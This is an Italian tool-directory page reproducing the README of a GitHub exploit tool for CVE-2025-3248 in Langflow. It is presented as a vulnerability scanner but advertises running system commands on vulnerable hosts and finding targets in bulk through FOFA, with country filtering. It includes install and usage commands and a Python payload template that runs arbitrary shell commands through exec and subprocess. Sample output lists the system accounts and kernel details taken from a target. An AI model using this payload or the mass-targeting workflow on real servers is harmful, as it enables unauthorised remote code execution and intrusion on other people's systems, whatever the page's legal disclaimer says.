Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3248 — Uno scanner di vulnerabilità per CVE-2025-3248 nelle applicazioni Langflow. Uno strumento per scansionare le vulnerabilità CVE-2025-3248 nelle applicazioni Langflow. | Kitploit
Strumenti/GitHubGitHub/xuemian168/cve-2025-3248
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniCommand and Control
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

Uno scanner di vulnerabilità per CVE-2025-3248 nelle applicazioni Langflow. Uno strumento per scansionare le vulnerabilità CVE-2025-3248 nelle applicazioni Langflow.

Vedi Repository
10211 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sito web
Condividi

中文 | English

Scanner di vulnerabilità Langflow

Uno scanner di vulnerabilità per CVE-2025-3248 nelle applicazioni Langflow.

Funzionalità

  • Scansione di un singolo target o di più target utilizzando FOFA
  • Esecuzione di comandi di sistema sui target vulnerabili
  • Recupero delle informazioni di sistema
  • Supporto per payload personalizzati
  • Barra di avanzamento per la scansione FOFA
  • Interfaccia CLI accattivante

Installazione

  1. Clona il repository:
root@kitploit:~
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. Installa le dipendenze:
root@kitploit:~
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. Modifica il file di ambiente (facoltativo)
root@kitploit:~
# After you finish editing
mv .env.example .env

Utilizzo

Scansione di un singolo target

root@kitploit:~
python main.py -t https://target.com

Utilizzo dell'API FOFA

root@kitploit:~
python main.py --fofa-email [email protected] --fofa-key your_api_key

Opzioni aggiuntive

  • -t, --target: URL del target da scansionare
  • --fofa-email: Email API FOFA
  • --fofa-key: Chiave API FOFA
  • --fofa-query: Query di ricerca FOFA (predefinita: 'app="LOGSPACE-LangFlow"')
  • --country: Filtra i risultati per codice paese (es. CN, US)
  • --max-pages: Numero massimo di pagine FOFA da recuperare (predefinito: 5)
  • --page-size: Risultati per pagina (predefinito: 100)
  • --timeout: Timeout della richiesta in secondi (predefinito: 10)
  • --no-verify: Disabilita la verifica SSL
  • --threads: Numero di thread per la scansione simultanea (predefinito: 5)
  • -f, --file: File Python personalizzato da usare come payload

Payload personalizzati

Puoi creare payload personalizzati creando un file Python:

root@kitploit:~
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

Quindi usalo con:

root@kitploit:~
python main.py -t https://target.com -f your_payload.py

Esempio di output

root@kitploit:~
    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
root@kitploit:~
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

Dichiarazione di non responsabilità

⚠️ Dichiarazione di non responsabilità Questo strumento è destinato esclusivamente a scopi legali. È progettato per scopi educativi, test di sicurezza interni alle aziende o per l'uso in ambienti autorizzati. È severamente vietato utilizzare questo strumento su qualsiasi sistema, rete o dispositivo non autorizzato; in caso contrario, potrebbe violare leggi e regolamenti pertinenti.

Gli utenti si assumono tutte le responsabilità legali per le proprie azioni. L'autore e i collaboratori non sono responsabili di eventuali perdite, fughe di dati o conseguenze legali causate dall'uso improprio di questo strumento.

⚠️ Non utilizzare per attacchi illegali. Non tentare di distribuire o eseguire questo strumento su sistemi non autorizzati.

Riferimenti

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

Licenza

MIT License

Scarica lo strumento